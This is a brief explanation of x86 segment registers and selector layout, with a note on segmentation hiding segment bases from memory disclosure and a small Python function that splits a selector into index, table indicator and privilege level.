There are six 2-byte segment registers in x86: %cs, %ds, %es, %fs, %gs, and %ss. The selector held in each register is used to index the GDT to get a particular segment descriptor. Every address that references the code segment uses the %cs selector. Every address that references the stack segment uses the %ss selector.
Specifically, the 13 most-significant bits of the selector are used for indexing into the GDT to get a segment descriptor. The next bit (bit 2) is the table indicator (TI), which specifies whether to use the GDT (0) or the local descriptor table (LDT) (1). The 2 least-significant bits are the requested privilege level (RPL).
For example, the address below resolves to GDT[%fs].base + 0x00010203.
mov %fs:0x00010203, %eax
The nice thing about segmentation is that it is not possible to find the address of the segment base through memory disclosure vulnerabilities. This is because the segment base is stored in the GDT, which lives in kernel space and is only accessible through segment selectors.
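The selector layout described above can be decoded with a few shifts and masks. The selector value 0x33 is just an example, and the function name is made up.

```python
def decode_selector(selector: int) -> dict:
    """Split a 16-bit segment selector into its three fields."""
    return {
        "index": selector >> 3,          # 13 most-significant bits: descriptor table index
        "ti": (selector >> 2) & 1,       # table indicator: 0 = GDT, 1 = LDT
        "rpl": selector & 0b11,          # requested privilege level
    }

fields = decode_selector(0x33)           # example value
print(fields)
```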